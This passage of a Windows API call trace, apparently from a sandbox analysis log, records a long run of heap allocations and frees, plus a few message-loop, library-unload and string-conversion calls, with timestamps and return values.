Size=0x10) returned 0x9b9b50 [0164.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0164.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0164.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0164.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0164.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0164.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0164.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0164.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0164.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0164.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0164.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0164.786] FreeLibrary (hLibModule=0x75990000) returned 1 [0164.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0164.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0164.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0164.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0164.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0164.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0164.788] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0164.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0164.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0164.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0164.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0164.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0164.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0164.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0164.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0164.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0164.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0164.788] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0164.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0164.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0164.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0164.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0164.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0164.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0164.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0164.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0164.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0164.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0164.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0164.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0164.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0164.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0164.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0164.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0164.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0164.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0164.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0164.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0164.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0164.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0164.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0164.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0164.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0164.792] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0164.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0164.792] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0164.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0164.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0164.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0164.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1900 [0164.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0164.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0164.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0164.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0164.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0164.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0164.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0164.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0164.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0164.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0164.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0164.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0164.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0164.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0164.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0164.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0164.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0164.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0164.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0164.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0164.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0164.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0164.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0164.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0164.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0164.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0164.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0164.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0164.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba498 [0164.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0164.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0164.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0164.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0164.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0164.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0164.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0164.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0164.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0164.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0164.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0164.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0164.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0164.794] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0164.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0164.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0164.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0164.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0164.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0164.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0164.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0164.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0164.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 